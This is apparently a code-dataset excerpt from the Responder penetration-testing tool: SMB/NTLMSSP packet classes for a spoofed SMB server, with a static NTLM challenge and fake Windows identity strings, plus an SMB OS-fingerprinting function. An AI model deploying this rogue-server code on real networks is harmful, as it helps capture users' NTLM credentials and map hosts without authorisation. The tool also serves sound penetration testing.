        AsnLenStart = str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
        # Contents of the SPNEGO negTokenInit (tag 0xA0).
        AsnLen2 = str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
        # The mechTypes SEQUENCE holding the four mechanism OIDs.
        MechTypeLen = str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])
        # The negHints block (context tag 3) carrying the principal name.
        Tag3Len = str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
        # Write back the lengths; the -2 offsets skip a 2-byte tag+length
        # header inside the span being measured.
        self.fields["Bcc"] = struct.pack("<h",len(CompleteBCCLen1))
        self.fields["InitContextTokenASNLen"] = struct.pack("<B", len(AsnLenStart))
        self.fields["ThisMechASNLen"] = struct.pack("<B", len(str(self.fields["ThisMechASNStr"])))
        self.fields["SpNegoTokenASNLen"] = struct.pack("<B", len(AsnLen2))
        self.fields["NegTokenASNLen"] = struct.pack("<B", len(AsnLen2)-2)
        self.fields["NegTokenTag0ASNLen"] = struct.pack("<B", len(MechTypeLen))
        self.fields["NegThisMechASNLen"] = struct.pack("<B", len(MechTypeLen)-2)
        self.fields["NegThisMech1ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech1ASNStr"])))
        self.fields["NegThisMech2ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech2ASNStr"])))
        self.fields["NegThisMech3ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech3ASNStr"])))
        self.fields["NegThisMech4ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech4ASNStr"])))
        self.fields["NegTokenTag3ASNLen"] = struct.pack("<B", len(Tag3Len))
        self.fields["NegHintASNLen"] = struct.pack("<B", len(Tag3Len)-2)
        self.fields["NegHintFinalASNLen"] = struct.pack("<B", len(str(self.fields["NegHintFinalASNStr"])))
class SMBSession1Data(Packet):
    """SMB_COM_SESSION_SETUP_ANDX response carrying an NTLMSSP CHALLENGE.

    The security blob is a SPNEGO negTokenTarg wrapping an NTLMSSP Type 2
    message (server challenge + AV pairs).  calculate() converts the
    string fields to UTF-16LE and then rewrites every length/offset field
    (ASN.1 lengths, byte counts, NTLMSSP buffer offsets) to match.

    NOTE(review): NTLMSSPNtServerChallenge holds a static 8-byte challenge
    here; presumably the caller overwrites it per-session — confirm at the
    call sites before relying on it.
    """
    fields = OrderedDict([
        ("Wordcount", "\x04"),
        ("AndXCommand", "\xff"),
        ("Reserved", "\x00"),
        ("Andxoffset", "\x5f\x01"),
        ("Action", "\x00\x00"),
        ("SecBlobLen", "\xea\x00"),
        ("Bcc", "\x34\x01"),
        ("ChoiceTagASNId", "\xa1"),
        ("ChoiceTagASNLenOfLen", "\x81"),
        ("ChoiceTagASNIdLen", "\x00"),
        ("NegTokenTagASNId", "\x30"),
        ("NegTokenTagASNLenOfLen","\x81"),
        ("NegTokenTagASNIdLen", "\x00"),
        ("Tag0ASNId", "\xA0"),
        ("Tag0ASNIdLen", "\x03"),
        ("NegoStateASNId", "\x0A"),
        ("NegoStateASNLen", "\x01"),
        ("NegoStateASNValue", "\x01"),
        ("Tag1ASNId", "\xA1"),
        ("Tag1ASNIdLen", "\x0c"),
        ("Tag1ASNId2", "\x06"),
        ("Tag1ASNId2Len", "\x0A"),
        ("Tag1ASNId2Str", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
        ("Tag2ASNId", "\xA2"),
        ("Tag2ASNIdLenOfLen", "\x81"),
        ("Tag2ASNIdLen", "\xED"),
        ("Tag3ASNId", "\x04"),
        ("Tag3ASNIdLenOfLen", "\x81"),
        ("Tag3ASNIdLen", "\xEA"),
        ("NTLMSSPSignature", "NTLMSSP"),
        ("NTLMSSPSignatureNull", "\x00"),
        ("NTLMSSPMessageType", "\x02\x00\x00\x00"),
        ("NTLMSSPNtWorkstationLen","\x1e\x00"),
        ("NTLMSSPNtWorkstationMaxLen","\x1e\x00"),
        ("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"),
        ("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"),
        ("NTLMSSPNtServerChallenge","\x81\x22\x33\x34\x55\x46\xe7\x88"),
        ("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"),
        ("NTLMSSPNtTargetInfoLen","\x94\x00"),
        ("NTLMSSPNtTargetInfoMaxLen","\x94\x00"),
        ("NTLMSSPNtTargetInfoBuffOffset","\x56\x00\x00\x00"),
        ("NegTokenInitSeqMechMessageVersionHigh","\x05"),
        ("NegTokenInitSeqMechMessageVersionLow","\x02"),
        ("NegTokenInitSeqMechMessageVersionBuilt","\xce\x0e"),
        ("NegTokenInitSeqMechMessageVersionReserved","\x00\x00\x00"),
        ("NegTokenInitSeqMechMessageVersionNTLMType","\x0f"),
        ("NTLMSSPNtWorkstationName","SMB12"),
        ("NTLMSSPNTLMChallengeAVPairsId","\x02\x00"),
        ("NTLMSSPNTLMChallengeAVPairsLen","\x0a\x00"),
        ("NTLMSSPNTLMChallengeAVPairsUnicodeStr","SMB12"),
        ("NTLMSSPNTLMChallengeAVPairs1Id","\x01\x00"),
        ("NTLMSSPNTLMChallengeAVPairs1Len","\x1e\x00"),
        ("NTLMSSPNTLMChallengeAVPairs1UnicodeStr","SMB12"),
        ("NTLMSSPNTLMChallengeAVPairs2Id","\x04\x00"),
        ("NTLMSSPNTLMChallengeAVPairs2Len","\x1e\x00"),
        ("NTLMSSPNTLMChallengeAVPairs2UnicodeStr","SMB12"),
        ("NTLMSSPNTLMChallengeAVPairs3Id","\x03\x00"),
        ("NTLMSSPNTLMChallengeAVPairs3Len","\x1e\x00"),
        ("NTLMSSPNTLMChallengeAVPairs3UnicodeStr","SMB12"),
        ("NTLMSSPNTLMChallengeAVPairs5Id","\x05\x00"),
        ("NTLMSSPNTLMChallengeAVPairs5Len","\x04\x00"),
        ("NTLMSSPNTLMChallengeAVPairs5UnicodeStr","SMB12"),
        ("NTLMSSPNTLMChallengeAVPairs6Id","\x00\x00"),
        ("NTLMSSPNTLMChallengeAVPairs6Len","\x00\x00"),
        ("NTLMSSPNTLMPadding", ""),
        ("NativeOs","Windows Server 2003 3790 Service Pack 2"),
        ("NativeOsTerminator","\x00\x00"),
        ("NativeLAN", "Windows Server 2003 5.2"),
        ("NativeLANTerminator","\x00\x00"),
    ])
    def calculate(self):
        ###### Convert strings to Unicode
        self.fields["NTLMSSPNtWorkstationName"] = self.fields["NTLMSSPNtWorkstationName"].encode('utf-16le')
        self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le')
        self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le')
        self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le')
        self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le')
        self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le')
        self.fields["NativeOs"] = self.fields["NativeOs"].encode('utf-16le')
        self.fields["NativeLAN"] = self.fields["NativeLAN"].encode('utf-16le')
        ###### SecBlobLen Calc:
        # SPNEGO wrapper bytes preceding the NTLMSSP message.
        AsnLen = str(self.fields["ChoiceTagASNId"])+str(self.fields["ChoiceTagASNLenOfLen"])+str(self.fields["ChoiceTagASNIdLen"])+str(self.fields["NegTokenTagASNId"])+str(self.fields["NegTokenTagASNLenOfLen"])+str(self.fields["NegTokenTagASNIdLen"])+str(self.fields["Tag0ASNId"])+str(self.fields["Tag0ASNIdLen"])+str(self.fields["NegoStateASNId"])+str(self.fields["NegoStateASNLen"])+str(self.fields["NegoStateASNValue"])+str(self.fields["Tag1ASNId"])+str(self.fields["Tag1ASNIdLen"])+str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"])+str(self.fields["Tag2ASNId"])+str(self.fields["Tag2ASNIdLenOfLen"])+str(self.fields["Tag2ASNIdLen"])+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"])
        # The full NTLMSSP Type 2 message (header + payload buffers).
        # NOTE(review): a few terms below lack the str() wrapper the others
        # have; harmless on Python 2 because the field values are already
        # str, but inconsistent — verify before porting.
        CalculateSecBlob = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NTLMSSPNtWorkstationName"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
        ###### Bcc len
        BccLen = AsnLen+CalculateSecBlob+str(self.fields["NTLMSSPNTLMPadding"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["NativeLAN"])+str(self.fields["NativeLANTerminator"])
        ###### SecBlobLen
        self.fields["SecBlobLen"] = struct.pack("<h", len(AsnLen+CalculateSecBlob))
        self.fields["Bcc"] = struct.pack("<h", len(BccLen))
        # ASN.1 lengths (long-form, one length octet after the 0x81 marker);
        # -3/-6 skip the already-emitted tag+length headers.
        self.fields["ChoiceTagASNIdLen"] = struct.pack(">B", len(AsnLen+CalculateSecBlob)-3)
        self.fields["NegTokenTagASNIdLen"] = struct.pack(">B", len(AsnLen+CalculateSecBlob)-6)
        self.fields["Tag1ASNIdLen"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"])))
        self.fields["Tag1ASNId2Len"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2Str"])))
        self.fields["Tag2ASNIdLen"] = struct.pack(">B", len(CalculateSecBlob+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"])))
        self.fields["Tag3ASNIdLen"] = struct.pack(">B", len(CalculateSecBlob))
        ###### Andxoffset calculation.
        # +32 accounts for the fixed SMB header that precedes this body.
        CalculateCompletePacket = str(self.fields["Wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["Reserved"])+str(self.fields["Andxoffset"])+str(self.fields["Action"])+str(self.fields["SecBlobLen"])+str(self.fields["Bcc"])+BccLen
        self.fields["Andxoffset"] = struct.pack("<h", len(CalculateCompletePacket)+32)
        ###### Workstation Offset
        # Fixed-size NTLMSSP header portion before the workstation buffer.
        CalculateOffsetWorkstation = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
        ###### AvPairs Offset
        CalculateLenAvpairs = str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
        ##### Workstation Offset Calculation:
        self.fields["NTLMSSPNtWorkstationBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation))
        self.fields["NTLMSSPNtWorkstationLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
        self.fields["NTLMSSPNtWorkstationMaxLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
        ##### IvPairs Offset Calculation:
        self.fields["NTLMSSPNtTargetInfoBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])))
        self.fields["NTLMSSPNtTargetInfoLen"] = struct.pack("<h", len(CalculateLenAvpairs))
        self.fields["NTLMSSPNtTargetInfoMaxLen"] = struct.pack("<h", len(CalculateLenAvpairs))
        ##### IvPair Calculation:
        self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])))
        self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])))
        self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])))
        self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])))
        self.fields["NTLMSSPNTLMChallengeAVPairsLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])))
class SMBSession2Accept(Packet):
    """Final SMB_COM_SESSION_SETUP_ANDX response: SPNEGO accept-completed.

    SSPIAccept is a pre-built negTokenTarg with negState accept-completed;
    calculate() only converts the native strings to UTF-16LE and fixes the
    byte count.  NOTE(review): SecBlobLen is left at its static default
    here — it happens to match the fixed 9-byte SSPIAccept blob.
    """
    fields = OrderedDict([
        ("Wordcount", "\x04"),
        ("AndXCommand", "\xff"),
        ("Reserved", "\x00"),
        ("Andxoffset", "\xb4\x00"),
        ("Action", "\x00\x00"),
        ("SecBlobLen", "\x09\x00"),
        ("Bcc", "\x89\x01"),
        ("SSPIAccept","\xa1\x07\x30\x05\xa0\x03\x0a\x01\x00"),
        ("NativeOs","Windows Server 2003 3790 Service Pack 2"),
        ("NativeOsTerminator","\x00\x00"),
        ("NativeLAN", "Windows Server 2003 5.2"),
        ("NativeLANTerminator","\x00\x00"),
    ])
    def calculate(self):
        # OS / LAN Manager strings go out as UTF-16LE.
        self.fields["NativeOs"] = self.fields["NativeOs"].encode('utf-16le')
        self.fields["NativeLAN"] = self.fields["NativeLAN"].encode('utf-16le')
        # Byte count covers the blob plus both terminated native strings.
        BccLen = str(self.fields["SSPIAccept"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["NativeLAN"])+str(self.fields["NativeLANTerminator"])
        self.fields["Bcc"] = struct.pack("<h", len(BccLen))
class SMBSessEmpty(Packet):
    """Three-byte null filler body used where an empty SMB payload is needed."""
    fields = OrderedDict([
        ("Empty", "\x00\x00\x00"),
    ])
class SMBTreeData(Packet):
    """SMB_COM_TREE_CONNECT_ANDX response granting an IPC service share."""
    fields = OrderedDict([
        ("Wordcount", "\x07"),
        ("AndXCommand", "\xff"),
        ("Reserved","\x00" ),
        ("Andxoffset", "\xbd\x00"),
        ("OptionalSupport","\x00\x00"),
        ("MaxShareAccessRight","\x00\x00\x00\x00"),
        ("GuestShareAccessRight","\x00\x00\x00\x00"),
        ("Bcc", "\x94\x00"),
        ("Service", "IPC"),
        ("ServiceTerminator","\x00\x00\x00\x00"),
    ])
    def calculate(self):
        ## Complete Packet Len
        CompletePacket= str(self.fields["Wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["Reserved"])+str(self.fields["Andxoffset"])+str(self.fields["OptionalSupport"])+str(self.fields["MaxShareAccessRight"])+str(self.fields["GuestShareAccessRight"])+str(self.fields["Bcc"])+str(self.fields["Service"])+str(self.fields["ServiceTerminator"])
        ## AndXOffset (+32 for the SMB header that precedes this body)
        self.fields["Andxoffset"] = struct.pack("<H", len(CompletePacket)+32)
        ## BCC Len Calc
        BccLen= str(self.fields["Service"])+str(self.fields["ServiceTerminator"])
        self.fields["Bcc"] = struct.pack("<H", len(BccLen))
class SMBSessTreeAns(Packet):
    """Combined Session Setup AndX + Tree Connect AndX response (chained).

    The first half answers the session setup (native OS/LAN strings); the
    chained second half (WordcountTree onward) grants an "A:" disk share.
    """
    fields = OrderedDict([
        ("Wordcount", "\x03"),
        ("Command", "\x75"),
        ("Reserved", "\x00"),
        ("AndXoffset", "\x4e\x00"),
        ("Action", "\x01\x00"),
        ("Bcc", "\x25\x00"),
        ("NativeOs", "Windows 5.1"),
        ("NativeOsNull", "\x00"),
        ("NativeLan", "Windows 2000 LAN Manager"),
        ("NativeLanNull", "\x00"),
        ("WordcountTree", "\x03"),
        ("AndXCommand", "\xff"),
        ("Reserved1", "\x00"),
        ("AndxOffset", "\x00\x00"),
        ("OptionalSupport", "\x01\x00"),
        ("Bcc2", "\x08\x00"),
        ("Service", "A:"),
        ("ServiceNull", "\x00"),
        ("FileSystem", "NTFS"),
        ("FileSystemNull", "\x00"),
    ])
    def calculate(self):
        ## AndxOffset
        # Offset of the chained Tree Connect reply: first-half length + the
        # 32-byte SMB header.  Packed as a 4-byte int then truncated to the
        # 2-byte field.
        CalculateCompletePacket = str(self.fields["Wordcount"])+str(self.fields["Command"])+str(self.fields["Reserved"])+str(self.fields["AndXoffset"])+str(self.fields["Action"])+str(self.fields["Bcc"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsNull"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanNull"])
        self.fields["AndXoffset"] = struct.pack("<i", len(CalculateCompletePacket)+32)[:2]
        ## BCC 1 and 2
        CompleteBCCLen = str(self.fields["NativeOs"])+str(self.fields["NativeOsNull"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanNull"])
        self.fields["Bcc"] = struct.pack("<h",len(CompleteBCCLen))
        CompleteBCC2Len = str(self.fields["Service"])+str(self.fields["ServiceNull"])+str(self.fields["FileSystem"])+str(self.fields["FileSystemNull"])
        self.fields["Bcc2"] = struct.pack("<h",len(CompleteBCC2Len))
### SMB2 Packets
class SMB2Header(Packet):
    """SMB header used for the SMB2-capable negotiate probe.

    NOTE(review): despite the class name, the magic is "\\xffSMB" (SMB1);
    SMB2 support is negotiated via the dialect list in SMB2NegoData, not
    via an SMB2 ("\\xfeSMB") header — confirm against the callers.
    """
    fields = OrderedDict([
        ("Proto", "\xff\x53\x4d\x42"),
        ("Cmd", "\x72"),
        ("Error-Code", "\x00\x00\x00\x00" ),
        ("Flag1", "\x10"),
        ("Flag2", "\x00\x00"),
        ("Pidhigh", "\x00\x00"),
        ("Signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
        ("Reserved", "\x00\x00"),
        ("TID", "\x00\x00"),
        ("PID", "\xff\xfe"),
        ("UID", "\x00\x00"),
        ("MID", "\x00\x00"),
    ])
class SMB2Nego(Packet):
    """SMB_COM_NEGOTIATE request body; calculate() refreshes the byte
    count from whatever dialect data was attached."""
    fields = OrderedDict([
        ("Wordcount", "\x00"),
        ("Bcc", "\x62\x00"),
        ("Data", ""),
    ])
    def calculate(self):
        # Byte count = length of the trailing dialect list.
        data_length = len(str(self.fields["Data"]))
        self.fields["Bcc"] = struct.pack("<H", data_length)
class SMB2NegoData(Packet):
    """Dialect list for the negotiate probe: each entry is a 0x02 buffer-format
    byte followed by a null-terminated dialect string (NT LM 0.12, SMB 2.002,
    and the SMB 2.??? wildcard)."""
    fields = OrderedDict([
        ("StrType","\x02" ),
        ("dialect", "NT LM 0.12\x00"),
        ("StrType1","\x02"),
        ("dialect1", "SMB 2.002\x00"),
        ("StrType2","\x02"),
        ("dialect2", "SMB 2.???\x00"),
    ])
| 75,480 | Python | .py | 1,222 | 58.794599 | 1,786 | 0.657777 | SpiderLabs/Responder | 4,450 | 1,663 | 44 | GPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,390 | fingerprint.py | SpiderLabs_Responder/fingerprint.py | #!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import socket
import struct
from utils import color
from packets import SMBHeader, SMBNego, SMBNegoFingerData, SMBSessionFingerData
def OsNameClientVersion(data):
    """Extract the native OS and LanManager client strings from an SMB
    Session Setup AndX response.

    data -- the raw SMB response (Python 2 str).  The security-blob length
            word at offset 43 is used to skip to the two null-terminated
            UTF-16 version strings that follow it.

    Returns a (OsVersion, ClientVersion) tuple, or a pair of explanatory
    error strings when the packet cannot be parsed.
    """
    try:
        # Little-endian security-blob length at offset 43.
        length = struct.unpack('<H',data[43:45])[0]
        # The two UTF-16 strings follow the blob; split on the double-null
        # terminators and strip the interleaved NUL bytes.
        # (Removed an unused duplicate of this split that was previously
        # assigned to a throwaway variable.)
        OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]])
        return OsVersion, ClientVersion
    except Exception:
        # Malformed or truncated response: keep the two-tuple contract.
        return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
def RunSmbFinger(host):
    """Fingerprint an SMB server by driving a negotiate + session setup.

    host -- (ip, port) tuple passed straight to socket.connect().

    Returns the (OsVersion, ClientVersion) tuple from OsNameClientVersion()
    on success; returns None implicitly (after printing a warning) on any
    socket/protocol error.
    """
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(host)
        s.settimeout(0.7)
        # SMB_COM_NEGOTIATE with extended-security flags.
        h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
        n = SMBNego(data = SMBNegoFingerData())
        n.calculate()
        Packet = str(h)+str(n)
        # NetBIOS session service: 4-byte big-endian length prefix.
        Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
        s.send(Buffer)
        data = s.recv(2048)
        # 0x72 0x00 => negotiate succeeded; proceed to session setup.
        if data[8:10] == "\x72\x00":
            Header = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00")
            Body = SMBSessionFingerData()
            Body.calculate()
            Packet = str(Header)+str(Body)
            Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
            s.send(Buffer)
            data = s.recv(2048)
            # 0x73 0x16 => more-processing-required; response carries the
            # native OS / LanManager strings we want.
            if data[8:10] == "\x73\x16":
                return OsNameClientVersion(data)
    except:
        print color("[!] ", 1, 1) +" Fingerprint failed"
        return None
| 2,088 | Python | .py | 53 | 36.811321 | 110 | 0.725383 | SpiderLabs/Responder | 4,450 | 1,663 | 44 | GPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,391 | Icmp-Redirect.py | SpiderLabs_Responder/tools/Icmp-Redirect.py | #! /usr/bin/env python
# NBT-NS/LLMNR Responder
# Created by Laurent Gaffie
# Copyright (C) 2014 Trustwave Holdings, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
